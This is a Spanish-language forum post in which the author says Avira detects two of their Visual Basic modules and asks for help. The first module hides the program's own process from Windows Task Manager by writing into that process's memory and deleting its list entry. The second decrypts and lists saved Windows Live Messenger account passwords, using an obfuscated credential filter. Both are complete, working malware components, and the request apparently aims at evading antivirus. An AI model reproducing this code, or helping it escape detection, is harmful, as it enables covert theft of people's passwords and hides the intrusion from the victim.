Codigo 'virico'

Holaaaaas

:3

el avira me detecta 2 modulos como viricos,

este es para ocultar el proceso del admin de tareas

Código

 
Option Explicit
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
 
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
 
Public Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Public Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
 
Const PROCESS_VM_OPERATION = &H8
Const PROCESS_VM_READ = &H10
Const PROCESS_VM_WRITE = &H20
Const PROCESS_ALL_ACCESS = 0
Private Const PAGE_READWRITE = &H4&
 
Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_DECOMMIT = &H4000
Const MEM_RELEASE = &H8000
Const MEM_FREE = &H10000
Const MEM_PRIVATE = &H20000
Const MEM_MAPPED = &H40000
Const MEM_TOP_DOWN = &H100000
 
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
 
Private Const LVM_FIRST = &H1000
Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)
 
Private Const LVM_GETITEMW = (LVM_FIRST + 75)
Private Const LVIF_TEXT = &H1
Private Const LVM_DELETEITEM = 4104
 
Public Type LV_ITEM
 mask As Long
 iItem As Long
 iSubItem As Long
 State As Long
 stateMask As Long
 lpszText As Long 'LPCSTR
 cchTextMax As Long
 iImage As Long
 lParam As Long
 iIndent As Long
End Type
 
Type LV_TEXT
 sItemText As String * 80
End Type
 
Public Function Procesos(ByVal hWnd2 As Long, lParam As String) As Boolean
Dim Nombre As String * 255, nombreClase As String * 255
Dim Nombre2 As String, nombreClase2 As String
Dim X As Long, Y As Long
X = GetWindowText(hWnd2, Nombre, 255)
Y = GetClassName(hWnd2, nombreClase, 255)
 
Nombre = Left(Nombre, X)
nombreClase = Left(nombreClase, Y)
Nombre2 = Trim(Nombre)
nombreClase2 = Trim(nombreClase)
If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
 OcultarItems (hWnd2)
 Exit Function
End If
If Nombre2 = "" And nombreClase2 = "" Then
Procesos = False
Else
Procesos = True
End If
End Function
 
Private Function OcultarItems(ByVal hListView As Long) ' As Variant
 Dim pid As Long, tid As Long
 Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
 Dim DirMemComp As Long, dwTam As Long
 Dim DirMemComp2 As Long
 Dim sLVItems() As String
 Dim li As LV_ITEM
 Dim lt As LV_TEXT
 If hListView = 0 Then Exit Function
 tid = GetWindowThreadProcessId(hListView, pid)
 nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
 If nElem = 0 Then Exit Function
 ReDim sLVItems(nElem - 1)
 li.cchTextMax = 80
 dwTam = Len(li)
 DirMemComp = GetMemComp(pid, dwTam, hProceso)
 DirMemComp2 = GetMemComp(pid, LenB(lt), hProceso)
 For i = 0 To nElem - 1
 li.lpszText = DirMemComp2
 li.cchTextMax = 80
 li.iItem = i
 li.mask = LVIF_TEXT
 WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
 lt.sItemText = Space(80)
 WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
 Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
 Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
 If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then '<===========CAMBIAR
 Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
 Exit Function
 End If
 Next i
 CloseMemComp hProceso, DirMemComp, dwTam
 CloseMemComp hProceso, DirMemComp2, LenB(lt)
End Function
 
Private Function GetMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
 hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
 GetMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
End Function
 
Private Sub CloseMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
 Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
 CloseHandle hProceso
End Sub
Private Function TrimNull(sInput As String) As String
 Dim pos As Integer
 pos = InStr(sInput, Chr$(0))
 If pos Then
 TrimNull = Left$(sInput, pos - 1)
 Exit Function
 End If
 TrimNull = sInput
End Function
Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
Dim Handle As Long
Handle = FindWindow(vbNullString, "Administrador de tareas de Windows")
If Handle <> 0 Then EnumChildWindows Handle, AddressOf Procesos, 1
End Sub
 
Public Sub Ocultar(ByVal hwnd As Long)
 App.TaskVisible = False
 SetTimer hwnd, 0, 20, AddressOf TimerProc
End Sub
 
Public Sub Mostrar(ByVal hwnd As Long)
 App.TaskVisible = True
 KillTimer hwnd, 0
End Sub

y este es para obtener las contraseñas del msn guardadas

Código

 
Option Explicit
 
'---------------------------------------------------------------------------------------
' Module      : mMessengerPass
' DateTime    : 23/09/2008 11:24
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advance.com.ar
' Purpose     : Read WLM (>= 8.0) pass
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference   : No idea about the original author, It was a french guy tho
'
' History     : 23/09/2008 First Cut....................................................
'---------------------------------------------------------------------------------------
 
 
Private Declare Function LocalFree Lib "kernel32.dll" (ByVal hMem As Long) As Long
Private Declare Function LocalAlloc Lib "kernel32.dll" (ByVal wFlags As Long, ByVal wBytes As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Declare Function CredEnumerate Lib "ADVAPI32.dll" Alias "CredEnumerateW" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
Private Declare Function CredFree Lib "ADVAPI32.dll" (ByVal pBuffer As Long) As Long
Private Declare Function CryptUnprotectData Lib "crypt32.dll" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As DATA_BLOB) As Long
Private Declare Function SysAllocString Lib "oleaut32.dll" (ByVal pOlechar As Long) As String
Private Declare Function GetVersionEx Lib "kernel32.dll" Alias "GetVersionExA" (ByRef lpVersionInformation As OSVERSIONINFO) As Long
 
Private Type CREDENTIAL
    dwFlags                 As Long
    dwType                  As Long
    lpstrTargetName         As Long
    lpstrComment            As Long
    ftLastWritten           As Double
    dwCredentialBlobSize    As Long
    lpbCredentialBlob       As Long
    dwPersist               As Long
    dwAttributeCount        As Long
    lpAttributes            As Long
    lpstrTargetAlias        As Long
    lpUserName              As Long
End Type
 
Private Type DATA_BLOB
    cbData                  As Long
    pbData                  As Long
End Type
 
Private Type OSVERSIONINFO
    dwOSVersionInfoSize     As Long
    dwMajorVersion          As Long
    dwMinorVersion          As Long
    dwBuildNumber           As Long
    dwPlatformId            As Long
    szCSDVersion            As String * 128
End Type
 
Public Function EnumWLMAccounts() As String
    Dim lMem        As Long
    Dim i           As Long
    Dim lCount      As Long
    Dim lCred       As Long
    Dim ub          As Long
    Dim lPtr        As Long
    Dim tCred       As CREDENTIAL
    Dim tBlobOut    As DATA_BLOB
    Dim tBlobIn     As DATA_BLOB
    Dim sPass       As String
    Dim vData       As Variant
    Dim tOSV        As OSVERSIONINFO
 
    With tOSV
        .dwOSVersionInfoSize = Len(tOSV)
        Call GetVersionEx(tOSV)
        If Not .dwMajorVersion + .dwMinorVersion / 10 >= 5.1 Then
            Exit Function
        End If
    End With
 
    lMem = LocalAlloc(&H40, 38)
 
    vData = Array( _
       &H57, &H69, &H6E, &H64, &H6F, &H77, &H73, &H4C, &H69, _
       &H76, &H65, &H3A, &H6E, &H61, &H6D, &H65, &H3D, &H2A)
 
    For i = 0 To 17
        Call CopyMemory(ByVal lMem + (i * 2), CLng(vData(i)), &H1)
    Next
 
    Call CredEnumerate(lMem, 0, lCount, lCred)
 
    If lCount Then
        For i = ub To ub + lCount - 1
 
            Call CopyMemory(ByVal VarPtr(lPtr), ByVal lCred + (i - ub) * 4, &H4)
            Call CopyMemory(ByVal VarPtr(tCred), ByVal lPtr, &H34)
 
            With tBlobIn
                .pbData = tCred.lpbCredentialBlob
                .cbData = tCred.dwCredentialBlobSize
 
                Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, tBlobOut)
 
                sPass = Space(.cbData \ 2)
                Call CopyMemory(ByVal StrPtr(sPass), ByVal .pbData, .cbData)
            End With
 
                       EnumWLMAccounts = EnumWLMAccounts & vbCrLf & vbCrLf & String(50, "-") & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Protocolo: " & StrConv(SysAllocString(tCred.lpstrTargetName), vbFromUnicode) & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Cuenta: " & StrConv(SysAllocString(tCred.lpUserName), vbFromUnicode) & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Contraseña: " & sPass & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & String(50, "-") & vbCrLf
 
        Next
        ub = ub + lCount
    End If
 
    Call CredFree(lCred)
    Call LocalFree(lMem)
End Function

la verdad nose que hay que hacer,

osea es como q estoy en el desierto sin brujula y tengo q ir al norte (en este desierto no hay sol xd) (?

que tengo que hacer?